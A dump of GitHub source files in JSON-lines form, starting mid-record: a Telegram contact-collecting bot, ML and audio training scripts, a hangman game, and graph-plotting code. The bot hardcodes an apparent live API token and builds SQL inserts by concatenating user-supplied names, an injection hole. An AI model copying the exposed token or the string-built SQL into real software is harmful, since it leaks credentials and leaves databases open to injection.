title)\n","repo_name":"Rajeshwaran2001/yt-dlp","sub_path":"yt_dlp/extractor/asobichannel.py","file_name":"asobichannel.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"6935617331","text":"# -*- coding: utf-8 -*-\nfrom email import message\nfrom genericpath import exists\nfrom operator import contains\nfrom turtle import update\nfrom matplotlib.style import context\nimport telegram\nfrom telegram.ext import Updater, CallbackContext, CommandHandler, MessageHandler, Filters\nfrom telegram import Contact, MessageId, Update\nimport logging\nimport sqlite3\n \n\n# inicialização\nupdater = Updater(token=\"5180663220:AAGRZL-gErS01fkfIU0zoRmlCQxaoFLMvV4\")\ndispatcher = updater.dispatcher\n\nbot = telegram.Bot(\"5180663220:AAGRZL-gErS01fkfIU0zoRmlCQxaoFLMvV4\")\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',level=logging.INFO) # mostrará os erros\n\nnumero = ''\n\nglobal opcoes_handler\nopcoes_handler = ''\n\n# responde o command messages /\n\n# solicita contato para o user e começa robô\ndef start(update: Update, context: CallbackContext):\n global botao\n global custom\n\n if opcoes_handler != '':\n dispatcher.remove_handler(opcoes_handler)\n\n\n \n botao = telegram.KeyboardButton('Mandar contato', request_contact = True)\n custom = [[botao]]\n reply_markup = telegram.ReplyKeyboardMarkup(custom)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"\"\"\n Ola! Aqui é o robô do Telegram.\n Envie seu contato para podemos prosseguir:\n \"\"\",reply_markup=reply_markup) \n \n\nstart_handler = CommandHandler('start', start)\ndispatcher.add_handler(start_handler)\n\n\n# pega o contato enviado pelo user\n# Toda mensagem retorna True\ndef mandar_opcoes(update: Update, context: CallbackContext):\n # chat_id=update.effective_chat.id -> localização da mensagem (os chats com updates)\n # update.message.text --> ultimo mensagem do chat \n # dispatcher.remove_handler(start_handler)\n reply_markup = telegram.ReplyKeyboardRemove(custom)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"\"\"\n Digite um dos números abaixo para escolher uma das opções\n 1 --> você escolheu a opção 1\n 2 --> você escolheu a opção 2 -- jpeg\n 3 --> você escolheu a opção 3 -- video\n 4 --> você escolheu a opção 4 -- pdf\n \"\"\", reply_markup=reply_markup)\n global numero\n global first_name\n global last_name\n numero = update.message.contact.phone_number\n first_name = update.message.contact.first_name\n last_name = update.message.contact.last_name\n print(f' dentro do mandar opções -> {numero}')\n # print(update.message.contact)\n # print(f\"{numero} e {first_name} {last_name}\")\n salvar()\n\n\n\n# Salvar informações no banco\n\ndef salvar():\n\n banco = sqlite3.connect('banco.db')\n cursor = banco.cursor()\n # cursor.execute(\"CREATE TABLE users (id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, numero text, first_name text, last_name text)\")\n print(f' dentro do salvar -> {numero}')\n busca_numeros = cursor.execute(\"SELECT numero FROM users\")\n \n numeros = busca_numeros.fetchall()\n\n if len(numero) > 0:\n global opcoes_handler\n opcoes_handler = MessageHandler(Filters.text, opcoes)\n dispatcher.add_handler(opcoes_handler)\n dispatcher.remove_handler(tente_novamente_handler)\n print(f' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA do salvar -> {numero}')\n\n for i in numeros:\n if i[0] == numero:\n return False\n\n\n if last_name != None:\n cursor.execute(\"INSERT INTO users VALUES(NULL, '\"+ numero + \"','\"+ first_name + \"','\"+ last_name + \"')\")\n else:\n cursor.execute(\"INSERT INTO users VALUES(NULL, '\"+ numero + \"','\"+ first_name + \"','\"+ 'VAZIO' + \"')\")\n\n\n banco.commit()\n\n \n\ndef opcoes(update: Update, context: CallbackContext):\n if update.message.text == '1':\n context.bot.send_message(chat_id=update.effective_chat.id, text='você escolheu a opção 1')\n elif update.message.text == '2':\n context.bot.send_photo(chat_id=update.effective_chat.id, photo=open('files/images.jpg', 'rb'))\n elif update.message.text == '3':\n context.bot.send_video(chat_id=update.effective_chat.id,video=open('files/realshort.mp4', 'rb'), supports_streaming=True)\n elif update.message.text == '4':\n context.bot.send_document(chat_id=update.effective_chat.id, document=open('files/report.pdf', 'rb'))\n else:\n context.bot.send_message(chat_id=update.effective_chat.id,text=\"\"\"\n Opção não existente, tente novamente\n Digite um dos números abaixo para escolher uma das opções\n 1 --> você escolheu a opção 1\n 2 --> você escolheu a opção 2\n 3 --> você escolheu a opção 3\n 4 --> você escolheu a opção 4\n \"\"\")\n\ndef tente_novamente(update: Update, context: CallbackContext):\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"\"\"\n Por favor, envie seu contato para continuar. \\nCaso estiver usando o telegram web clique no ícone demonstrado a seguir.\n \"\"\")\n context.bot.send_photo(chat_id=update.effective_chat.id, photo=open('files/icone_contato.png', 'rb'))\n \n\n\n\ntente_novamente_handler = MessageHandler(Filters.text, tente_novamente)\ndispatcher.add_handler(tente_novamente_handler)\n\n\nmandar_opcoes_handler = MessageHandler(Filters.contact, mandar_opcoes)\ndispatcher.add_handler(mandar_opcoes_handler)\n\n# opcoes_handler = MessageHandler(Filters.text, opcoes)\n# dispatcher.add_handler(opcoes_handler)\n\nprint(f' fora -> {numero}')\n\n \n\nupdater.start_polling()","repo_name":"FelipeVidalG/telegram-bot","sub_path":"old_bot_telegram.py","file_name":"old_bot_telegram.py","file_ext":"py","file_size_in_byte":5758,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38160029193","text":"import numpy as np\nimport heapq\nimport pickle\nimport operator\n\n\n# Define parameters\n_TEST_RATIO = 0.15\n_VALIDATION_RATIO = 0.1\nICD_NUM = 4880 # Number of unique ICD codes\nLABEL_NUM = 272 # Number of categories for labels\nTREE_NUM = 728 # Number of knowledge ancestor nodes\nTIME_STEP = 41 # Maximum number of patient visits\n\n\ndef load_data(seqFile, labelFile, treeFile=''):\n sequences = np.array(pickle.load(open(seqFile, 'rb')))\n labels = np.array(pickle.load(open(labelFile, 'rb')))\n if len(treeFile) > 0:\n trees = np.array(pickle.load(open(treeFile, 'rb')))\n\n np.random.seed(0)\n dataSize = len(labels)\n ind = np.random.permutation(dataSize)\n nTest = int(_TEST_RATIO * dataSize)\n nValid = int(_VALIDATION_RATIO * dataSize)\n\n test_indices = ind[:nTest]\n valid_indices = ind[nTest:nTest+nValid]\n train_indices = ind[nTest+nValid:]\n\n train_set_x = sequences[train_indices]\n train_set_y = labels[train_indices]\n test_set_x = sequences[test_indices]\n test_set_y = labels[test_indices]\n valid_set_x = sequences[valid_indices]\n valid_set_y = labels[valid_indices]\n train_set_t = None\n test_set_t = None\n valid_set_t = None\n\n if len(treeFile) > 0:\n train_set_t = trees[train_indices]\n test_set_t = trees[test_indices]\n valid_set_t = trees[valid_indices]\n\n def len_argsort(seq):\n return sorted(range(len(seq)), key=lambda x: len(seq[x]))\n\n train_sorted_index = len_argsort(train_set_x)\n train_set_x = [train_set_x[i] for i in train_sorted_index]\n train_set_y = [train_set_y[i] for i in train_sorted_index]\n\n valid_sorted_index = len_argsort(valid_set_x)\n valid_set_x = [valid_set_x[i] for i in valid_sorted_index]\n valid_set_y = [valid_set_y[i] for i in valid_sorted_index]\n\n test_sorted_index = len_argsort(test_set_x)\n test_set_x = [test_set_x[i] for i in test_sorted_index]\n test_set_y = [test_set_y[i] for i in test_sorted_index]\n\n if len(treeFile) > 0:\n train_set_t = [train_set_t[i] for i in train_sorted_index]\n valid_set_t = [valid_set_t[i] for i in valid_sorted_index]\n test_set_t = [test_set_t[i] for i in test_sorted_index]\n\n train_set = (train_set_x, train_set_y, train_set_t)\n valid_set = (valid_set_x, valid_set_y, valid_set_t)\n test_set = (test_set_x, test_set_y, test_set_t)\n\n return train_set, valid_set, test_set\n\n\ndef padMatrix(seqs, labels, treeseqs=''):\n # lengths = np.array([len(seq) for seq in seqs]) - 1\n n_samples = len(seqs)\n # maxlen = np.max(lengths)\n\n x = np.zeros((n_samples, TIME_STEP, ICD_NUM), dtype=np.int8)\n y = np.zeros((n_samples, TIME_STEP, LABEL_NUM), dtype=np.int8)\n\n if len(treeseqs) > 0:\n tree = np.zeros((n_samples, TIME_STEP, TREE_NUM), dtype=np.int8)\n for idx, (seq, lseq, tseq) in enumerate(zip(seqs, labels, treeseqs)):\n for xvec, subseq in zip(x[idx, :, :], seq[:-1]):\n xvec[subseq] = 1.\n for yvec, subseq in zip(y[idx, :, :], lseq[1:]):\n yvec[subseq] = 1.\n for tvec, subseq in zip(tree[idx, :, :], tseq[:-1]):\n tvec[subseq] = 1.\n return x, y, tree\n\n else:\n for idx, (seq, lseq) in enumerate(zip(seqs, labels)):\n for xvec, subseq in zip(x[idx, :, :], seq[:-1]):\n xvec[subseq] = 1.\n for yvec, subseq in zip(y[idx, :, :], lseq[1:]):\n yvec[subseq] = 1.\n return x, y\n\ndef visit_level_precision(y_true, y_pred, rank=[5, 10, 15, 20, 25, 30]):\n recall = list()\n for i in range(len(y_true)):\n for j in range(len(y_true[i])):\n thisOne = list()\n codes = y_true[i][j]\n tops = y_pred[i][j]\n for rk in rank:\n thisOne.append(len(set(codes).intersection(set(tops[:rk]))) * 1.0 / min(rk, len(set(codes))))\n recall.append(thisOne)\n return (np.array(recall)).mean(axis=0).tolist()\n\n\ndef code_level_accuracy(y_true, y_pred, rank=[5, 10, 15, 20, 25, 30]):\n recall = list()\n for i in range(len(y_true)):\n for j in range(len(y_true[i])):\n thisOne = list()\n codes = y_true[i][j]\n tops = y_pred[i][j]\n for rk in rank:\n thisOne.append(len(set(codes).intersection(set(tops[:rk]))) * 1.0 / len(set(codes)))\n recall.append(thisOne)\n return (np.array(recall)).mean(axis=0).tolist()\n\n\ndef process_label(labelSeqs):\n newlabelSeq = []\n for i in range(len(labelSeqs)):\n newlabelSeq.append(labelSeqs[i][1:])\n return newlabelSeq\n\n\ndef convert2preds(preds):\n ccs_preds = []\n for i in range(len(preds)):\n temp = []\n for j in range(len(preds[i])):\n temp.append(list(zip(*heapq.nlargest(30, enumerate(preds[i][j]), key=operator.itemgetter(1))))[0])\n ccs_preds.append(temp)\n return ccs_preds","repo_name":"lywey/DMKAP","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"675893329","text":"#!/usr/bin/env python\nfrom PIL import Image\nfrom cStringIO import StringIO\nimport os\nimport base64\nimport sys\n\ndef run(data, zoom, x, y):\n here = os.path.dirname(__file__)\n full = os.path.join(here, \"worldmap.png\")\n img = Image.open(full)\n img = img.convert('RGBA')\n \n decoded_data = StringIO(base64.b64decode(data))\n decoded_img = Image.open(decoded_data)\n \n #doodle = Image.fromstring(\n decoded_size = decoded_img.size\n blank_img = Image.new('RGBA', img.size, (0,0,0,0))\n blank_img.paste(decoded_img, (200, 200))\n #blank_img.save('foo.png', format='PNG')\n img = Image.composite(blank_img, img, blank_img)\n img.save(os.path.join(here, 'worldmap-copy-pasted.png'))\n \n #open(full, \"w\").write(decoded)\n\n return 0\n\ndef test_paste():\n data = open('data.dat').read()\n \n run(data, None, None, None)\n \n \nif __name__ == '__main__':\n import sys\n sys.exit(run(*sys.argv[1:]))\n \n ","repo_name":"peterbe/gaffwall","sub_path":"static/tiles/savecanvas.py","file_name":"savecanvas.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"4769174719","text":"import os\nimport pytest\nfrom selenium import webdriver\nfrom settings.config import get_driver_path\n\n\n@pytest.fixture\ndef chrome():\n options = webdriver.ChromeOptions()\n options.add_argument(\"start-maximized\")\n options.add_argument(\"disable-infobars\")\n options.add_argument(\"--disable-extensions\")\n get_driver_path() # local enviroment variables are enabled\n\n driver = webdriver.Chrome(options=options, executable_path=os.getenv('CHROME_PATH'))\n driver.get('https://www.w3schools.com/sql/trysql.asp?filename=trysql_select_all')\n\n yield driver\n\n driver.close()\n","repo_name":"manifity/w3schools-trysql","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"13345731310","text":"import os\nimport argparse\nimport sys \n\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport torchvision \nfrom torchvision import transforms\nfrom torch.optim.lr_scheduler import ExponentialLR\n\nimport tensorboardX\nfrom tensorboardX import SummaryWriter\n\n\nfrom scipy.io import wavfile\nimport librosa\n\nimport soundfile as sf\nfrom pystoi.stoi import stoi\nfrom pypesq import pesq\n\nfrom tqdm import tqdm\nfrom models.layers.istft import ISTFT\nimport train_utils\nfrom load_dataset import AudioDataset\nfrom models.attention import AttentionModel\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_dir', default='experiment/SE_model.json', help=\"Directory containing params.json\")\nparser.add_argument('--restore_file', default=None, help=\"Optional, name of the file in --model_dir containing weights to reload before training\") # 'best' or 'train'\nparser.add_argument('--batch_size', default=128, type=int, help='train batch size')\nparser.add_argument('--num_epochs', default=100, type=int, help='train epochs number')\nparser.add_argument('--dropout_p', default = 0, type=float, help='Attention model drop out rate')\nparser.add_argument('--learning_rate', default = 5e-4, type=float, help = 'Learning rate')\nparser.add_argument('--attn_use', default = False, type=bool)\nparser.add_argument('--stacked_encoder', default = False, type = bool)\nparser.add_argument('--attn_len', default = 0, type = int)\nparser.add_argument('--hidden_size', default = 112, type = int)\nparser.add_argument('--ck_name', default = 'SEckpt.pt')\nargs = parser.parse_args()\n\n\nn_fft, hop_length = 512, 128\nwindow = torch.hann_window(n_fft).cuda()\n# STFT\nstft = lambda x: torch.stft(x, n_fft, hop_length, window=window)\n# ISTFT\nistft = ISTFT(n_fft, hop_length, window='hanning').cuda()\n\ndef normalized(tensor):\n output = [[] for i in range(len(tensor))]\n\n for i in range(len(tensor)):\n nummer = tensor[i] - torch.min(tensor[i])\n denomi = torch.max(tensor[i]) - torch.min(tensor[i])\n \n output[i] = (nummer / (denomi + 1e-5)).tolist()\n\n\n return torch.tensor(output)\n\n\ndef main(): \n #summary = SummaryWriter()\n #os.system('tensorboard --logdir=path_of_log_file')\n\n #set Hyper parameter\n json_path = os.path.join(args.model_dir)\n params = train_utils.Params(json_path)\n\n #data loader\n train_dataset = AudioDataset(data_type='train')\n train_data_loader = DataLoader(dataset=train_dataset, batch_size=args.batch_size, collate_fn=train_dataset.collate, shuffle=True, num_workers=4)\n test_dataset = AudioDataset(data_type='test')\n test_data_loader = DataLoader(dataset=test_dataset, batch_size=args.batch_size, collate_fn=test_dataset.collate, shuffle=False, num_workers=4)\n #model select\n print('Model initializing\\n')\n net = torch.nn.DataParallel(AttentionModel(257, hidden_size = args.hidden_size, dropout_p = args.dropout_p, use_attn = args.attn_use, stacked_encoder = args.stacked_encoder, attn_len = args.attn_len))\n #net = AttentionModel(257, 112, dropout_p = args.dropout_p, use_attn = args.attn_use)\n net = net.cuda()\n print(net)\n\n optimizer = optim.Adam(net.parameters(), lr=args.learning_rate)\n \n scheduler = ExponentialLR(optimizer, 0.5)\n\n #check point load\n #Check point load\n\n print('Trying Checkpoint Load\\n')\n ckpt_dir = 'ckpt_dir'\n if not os.path.exists(ckpt_dir):\n \tos.makedirs(ckpt_dir)\n\n best_PESQ = 0.\n best_STOI = 0.\n best_loss = 200000.\n ckpt_path = os.path.join(ckpt_dir, args.ck_name)\n if os.path.exists(ckpt_path):\n \tckpt = torch.load(ckpt_path)\n \ttry:\n \t net.load_state_dict(ckpt['model'])\n optimizer.load_state_dict(ckpt['optimizer'])\n best_loss = ckpt['best_loss']\n\n print('checkpoint is loaded !')\n print('current best loss : %.4f' % best_loss)\n \texcept RuntimeError as e:\n print('wrong checkpoint\\n')\n else: \n print('checkpoint not exist!')\n print('current best loss : %.4f' % best_loss)\n \n print('Training Start!')\n #train\n iteration = 0\n train_losses = []\n test_losses = []\n for epoch in range(args.num_epochs):\n train_bar = tqdm(train_data_loader)\n # train_bar = train_data_loader\n n = 0\n avg_loss = 0\n net.train()\n for input in train_bar:\n iteration += 1\n #load data\n train_mixed, train_clean, seq_len = map(lambda x: x.cuda(), input)\n\n mixed = stft(train_mixed)\n cleaned = stft(train_clean)\n mixed = mixed.transpose(1,2)\n cleaned = cleaned.transpose(1,2)\n real, imag = mixed[..., 0], mixed[..., 1]\n clean_real, clean_imag = cleaned[..., 0], cleaned[..., 1]\n mag = torch.sqrt(real**2 + imag**2)\n clean_mag = torch.sqrt(clean_real**2 + clean_imag**2)\n phase = torch.atan2(imag, real)\n \n\n #feed data\n out_mag, attn_weight = net(mag)\n out_real = out_mag * torch.cos(phase)\n out_imag = out_mag * torch.sin(phase)\n out_real, out_imag = torch.squeeze(out_real, 1), torch.squeeze(out_imag, 1)\n out_real = out_real.transpose(1,2)\n out_imag = out_imag.transpose(1,2)\n\n out_audio = istft(out_real, out_imag, train_mixed.size(1))\n out_audio = torch.squeeze(out_audio, dim=1)\n for i, l in enumerate(seq_len):\n out_audio[i, l:] = 0\n \n loss = 0\n PESQ = 0\n STOI = 0\n \n loss = F.mse_loss(out_mag, clean_mag, True)\n if torch.any(torch.isnan(loss)):\n torch.save({'clean_mag': clean_mag, 'out_mag': out_mag, 'mag': mag}, 'nan_mag')\n raise('loss is NaN')\n avg_loss += loss\n n += 1\n #gradient optimizer\n optimizer.zero_grad()\n\n \n #backpropagate LOSS\n loss.backward()\n\n\n #update weight\n optimizer.step()\n \n #for i in range(len(train_mixed)):\n # PESQ += pesq(train_clean[i].cpu().data.numpy(), out_audio[i].cpu().data.numpy(), 16000)\n # STOI += stoi(train_clean[i].cpu().data.numpy(), out_audio[i].cpu().data.numpy(), 16000, extended=False)\n #PESQ /= len(train_mixed)\n #STOI /= len(train_mixed)\n\n #flot tensorboard\n if iteration % 100 == 0 : \n print('[epoch: {}, iteration: {}] train loss : {:.4f} PESQ : {:.4f} STOI : {:.4f}'.format(epoch, iteration, loss, PESQ, STOI))\n \n avg_loss /= n\n #summary.add_scalar('Train Loss', avg_loss.item(), iteration)\n \n train_losses.append(avg_loss)\n if (len(train_losses) > 2) and (train_losses[-2] < avg_loss):\n print(\"Learning rate Decay\")\n scheduler.step()\n\n #test phase\n n = 0\n avg_test_loss = 0\n test_bar = tqdm(test_data_loader)\n\n net.eval()\n with torch.no_grad():\n for input in test_bar:\n test_mixed, test_clean, seq_len = map(lambda x: x.cuda(), input)\n mixed = stft(test_mixed)\n cleaned = stft(test_clean)\n mixed = mixed.transpose(1,2)\n cleaned = cleaned.transpose(1,2)\n real, imag = mixed[..., 0], mixed[..., 1]\n clean_real, clean_imag = cleaned[..., 0], cleaned[..., 1]\n mag = torch.sqrt(real**2 + imag**2)\n clean_mag = torch.sqrt(clean_real**2 + clean_imag**2)\n phase = torch.atan2(imag, real)\n \n logits_mag, logits_attn_weight = net(mag)\n logits_real = logits_mag * torch.cos(phase)\n logits_imag = logits_mag * torch.sin(phase)\n logits_real, logits_imag = torch.squeeze(logits_real, 1), torch.squeeze(logits_imag, 1)\n logits_real = logits_real.transpose(1,2)\n logits_imag = logits_imag.transpose(1,2)\n \n logits_audio = istft(logits_real, logits_imag, test_mixed.size(1))\n logits_audio = torch.squeeze(logits_audio, dim=1)\n for i, l in enumerate(seq_len):\n logits_audio[i, l:] = 0\n \n test_loss = 0\n test_PESQ = 0\n test_STOI = 0\n \n test_loss = F.mse_loss(logits_mag, clean_mag, True)\n #for i in range(len(test_mixed)):\n #librosa.output.write_wav('test_out.wav', logits_audio[i].cpu().data.numpy()[:seq_len[i].cpu().data.numpy()], 16000)\n # test_PESQ += pesq(test_clean[i].detach().cpu().numpy(), logits_audio[i].detach().cpu().numpy(), 16000)\n # test_STOI += stoi(test_clean[i].detach().cpu().numpy(), logits_audio[i].detach().cpu().numpy(), 16000, extended=False)\n \n #test_STOI /= len(test_mixed)\n avg_test_loss += test_loss\n n += 1\n #test loss\n #test_loss = wSDRLoss(test_mixed, test_clean, out_audio)\n #test_loss = torch.nn.MSELoss(out_audio, test_clean)\n\n #test accuracy\n #test_pesq = pesq('test_clean.wav', 'test_out.wav', 16000)\n #test_stoi = stoi('test_clean.wav', 'test_out.wav', 16000)\n\n avg_test_loss /= n\n test_losses.append(avg_test_loss)\n #summary.add_scalar('Test Loss', avg_test_loss.item(), iteration)\n print('[epoch: {}, iteration: {}] test loss : {:.4f} PESQ : {:.4f} STOI : {:.4f}'.format(epoch, iteration, avg_test_loss, test_PESQ, test_STOI))\n if avg_test_loss < best_loss:\n best_PESQ = test_PESQ\n best_STOI = test_STOI\n best_loss = avg_test_loss\n # Note: optimizer also has states ! don't forget to save them as well.\n ckpt = {'model':net.state_dict(),\n 'optimizer':optimizer.state_dict(),\n 'best_loss':best_loss}\n torch.save(ckpt, ckpt_path)\n print('checkpoint is saved !')\n\nif __name__ == '__main__':\n main()\n","repo_name":"chanil1218/Attention-SE.pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10403,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"47"} +{"seq_id":"29230455751","text":"import numpy as np\n\nMAX = 75\n\ndef gettimestamp(t):\n s = t % 10\n if s == 0:\n s = 10\n c = t // 10 \n if t % 10 != 0:\n c += 1\n return (t, s, c)\nvals = [0] * 10\nfor i in range(1, MAX + 1):\n vals[i % 10] += 1\nM2 = 0\nfor acumulado in vals:\n M2 += acumulado ** 2\n\nprint(\"M2: {}\".format(M2))\n\n# for i in range(0, 10):\n# timestamps = []\n# Ms = []\n# for j in range(0, 3):\n# x = np.random.randint(1, MAX + 1)\n# tupla = gettimestamp(x)\n# timestamps.append(tupla)\n# Ms.append((x * (2 * tupla[2] - 1)))\n# print(\"{}: med={} prom={} M2/med={} M2/prom={}\".format(timestamps, np.round(np.median(Ms), decimals=3), \n# np.round(np.mean(Ms), decimals=3), \n# np.round(M2 / np.median(Ms), decimals=3), \n# np.round(M2 / np.mean(Ms), decimals=3)))\n\ngrupos = {\n 'a': [4, 31, 72],\n 'b': [14, 35, 42],\n 'c': [17, 43, 51],\n 'd': [5, 33, 67]\n # '0': [1, 33, 75],\n # '1': [30,40,50],\n # '2': [50, 60, 70],\n # '3': [10, 20, 30]\n}\n\nfor k in grupos:\n vals = grupos[k]\n timestamps = []\n Ms = []\n for x in vals:\n tupla = gettimestamp(x)\n timestamps.append(tupla)\n Ms.append((x * (2 * tupla[2] - 1)))\n print(\"{}: med={} prom={} M2/med={} M2/prom={}\".format(timestamps, np.round(np.median(Ms), decimals=3), \n np.round(np.mean(Ms), decimals=3), \n np.round(M2 / np.median(Ms), decimals=3), \n np.round(M2 / np.mean(Ms), decimals=3)))\n","repo_name":"M-Picco/MaterialOrgaDatos","sub_path":"streaming/AMS.py","file_name":"AMS.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19212774699","text":"import random\r\n\r\nlistaPalavras=['pizza','sushi','lanche']\r\nArraypalavraSorteada=[]\r\nArraypalavraSorteadaTamanho=[]\r\npalavraSorteada= random.choice(listaPalavras);\r\nfor i in range(0,len(palavraSorteada)):\r\n ArraypalavraSorteada.append(palavraSorteada[i])\r\n ArraypalavraSorteadaTamanho.append('#')\r\nprint(ArraypalavraSorteada)\r\nfor x in range(0,5):\r\n chute = input('Escolha uma letra:')\r\n for i in range(0,len(palavraSorteada)):\r\n if ArraypalavraSorteada[i]==chute:\r\n ArraypalavraSorteadaTamanho.pop(i)\r\n ArraypalavraSorteadaTamanho.insert(i,chute)\r\n print(ArraypalavraSorteadaTamanho)\r\n continue\r\n continue\r\nif '#' in ArraypalavraSorteadaTamanho:\r\n print('Você perdeu!')\r\n print(ArraypalavraSorteadaTamanho)\r\nelse:\r\n print('Você ganhou!')\r\n print(ArraypalavraSorteada)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LucasMasaoK/ForcaPython","sub_path":"Forca.py","file_name":"Forca.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42906149447","text":"#!/usr/bin/env python3\n\n\n'''\nPlots reference graphs for authors and titles.\n'''\n\n\nimport networkx as nx\nfrom collections import defaultdict\nfrom matplotlib import pyplot as plt\nfrom matplotlib import style\nstyle.use('seaborn')\nimport random\nimport math\n\nimport util\nimport config as cfg\n\n\n#maximum number of nodes to plot. will select the most cited nodes\nMAX_N_AUTHOR_NODES = 64\nMAX_N_TITLE_NODES = 48\n#relabel titles/authors to use number instead of the title\nRELABEL_TITLES = False\nRELABEL_AUTHORS = False\n#graph drawing layouts to be tried in preference order\nPREFERRED_LAYOUTS = [\n lambda g: nx.drawing.nx_pydot.graphviz_layout(g, prog='neato'),\n lambda g: nx.drawing.kamada_kawai_layout(g),\n lambda g: nx.drawing.shell_layout(g),\n lambda g: None,\n]\n\n\ndef get_savefig_size(n_nodes):\n size = math.ceil(20*(n_nodes/24)**0.5)\n return (size, size)\n\n\ndef get_nx_graph(graph):\n nx_graph = nx.DiGraph()\n for u, vs in graph.items():\n nx_graph.add_edges_from([(u, v) for v in vs])\n return nx_graph\n\n\ndef get_graph(nx_graph):\n graph = {n: set() for n in nx_graph.nodes()}\n for u, v in nx_graph.edges():\n graph[u].add(v)\n return graph\n\n\ndef filter_graph(graph, nodes):\n nodes = set(nodes)\n graph = {k: v for k, v in graph.items() if k in nodes}\n graph = {k: {v_ for v_ in v if v_ in nodes} for k, v in graph.items()}\n return graph\n\n\ndef get_all_nodes(graph):\n all_nodes = set(graph.keys()) | set(util.flatten(graph.values()))\n return all_nodes\n\n\ndef select_nodes(nodes, hist, max_n_nodes=None):\n nodes = sorted(nodes, key=lambda n: hist.get(n, 0), reverse=True)\n nodes = set(nodes[slice(max_n_nodes)])\n return nodes\n\n\ndef reduce_graph(graph, hist, max_n_nodes=None):\n all_nodes = get_all_nodes(graph)\n nodes = select_nodes(all_nodes, hist, max_n_nodes)\n graph = filter_graph(graph, nodes)\n return graph\n\n\ndef relabel_graph(graph, mapping=None):\n if mapping is None:\n mapping = {k: i for i, k in enumerate(get_all_nodes(graph))}\n graph = {k: {mapping[v_] for v_ in v} for k, v in graph.items()}\n graph = {mapping[k]: v for k, v in graph.items()}\n return graph, mapping\n\n\ndef get_def_dict(dct, typ):\n new_dct = defaultdict(typ)\n for k, v in dct.items():\n new_dct[k] = v\n return new_dct\n\n\ndef relabel_hist(hist, mapping):\n new_hist = {}\n for k, v in mapping.items():\n new_hist[v] = hist.get(k, 0)\n new_hist = get_def_dict(new_hist, int)\n return new_hist\n\n\ndef unit_norm_hist(hist):\n minn = min(hist.values())\n maxx = max(hist.values())\n hist = {k: (v - minn)/(maxx - minn) for k, v in hist.items()}\n hist = get_def_dict(hist, float)\n return hist\n\n\ndef get_node_sizes(nx_graph, hist):\n hist = unit_norm_hist(hist)\n nodes = list(nx_graph.nodes())\n sizes = [int(128 + 4096*hist[n]) for n in nodes]\n return sizes\n\n\ndef get_plot_layout(nx_graph, layouts=PREFERRED_LAYOUTS):\n for fn in layouts:\n try:\n layout = fn(nx_graph)\n return layout\n except Exception as e:\n print('WARNING: could not get layout: \"{}\". trying next'.format(e))\n raise\n\n\ndef get_node_colors(nx_graph):\n graph = get_graph(nx_graph)\n hist = {k: len(v) for k, v in graph.items()}\n colors = [hist[n] for n in nx_graph.nodes()]\n return colors\n\n\ndef plot_nx_graph(graph, hist, **kwargs):\n norm_hist = unit_norm_hist(hist)\n fig, ax = plt.subplots()\n nx.draw_networkx(\n graph,\n pos=get_plot_layout(graph),\n ax=ax,\n node_size=get_node_sizes(graph, hist),\n node_color=get_node_colors(graph),\n cmap=plt.cm.YlOrRd,\n edge_color='grey',\n arrowsize=10,\n arrowstyle='->',\n font_color='black',\n **kwargs,\n )\n if kwargs.get('title') is not None:\n ax.set_title(kwargs['title'])\n ax.grid(False)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.tight_layout()\n return fig, ax\n\n\ndef plot_graph(graph, hist, relabel=False, max_n_nodes=None, title=None):\n graph = reduce_graph(graph, hist, max_n_nodes)\n if relabel:\n graph, mapping = relabel_graph(graph)\n hist = relabel_hist(hist, mapping)\n else:\n mapping = None\n nx_graph = get_nx_graph(graph)\n fig, ax = plot_nx_graph(nx_graph, hist,\n title='citation graph (top {} cited nodes)'.format(max_n_nodes))\n return fig, ax, mapping\n\n\ndef plot_titles_graph():\n graph = util.load_graph(cfg.paths['titles-refs-graph'])\n hist = util.load_csv_hist(cfg.paths['titles-refs-hist'])\n fig, ax, mapping = plot_graph(\n graph, hist, relabel=RELABEL_TITLES, max_n_nodes=MAX_N_TITLE_NODES)\n\n fig.set_size_inches(get_savefig_size(MAX_N_TITLE_NODES), forward=False)\n fig.savefig(cfg.paths['titles-graph-plot'], dpi=333)\n print('saved titles graph plot to \"{}\"'.format(\n cfg.paths['titles-graph-plot']))\n if mapping is not None:\n util.save_json(cfg.paths['titles-graph-plot-mapping'], mapping)\n print('saved titles graph plot mapping to \"{}\"'.format(\n cfg.paths['titles-graph-plot-mapping']))\n\n\ndef plot_authors_graph():\n graph = util.load_graph(cfg.paths['authors-refs-graph'])\n hist = get_def_dict(\n util.load_csv_hist(cfg.paths['authors-refs-hist']), int)\n fig, ax, mapping = plot_graph(\n graph, hist, relabel=RELABEL_AUTHORS, max_n_nodes=MAX_N_AUTHOR_NODES)\n\n 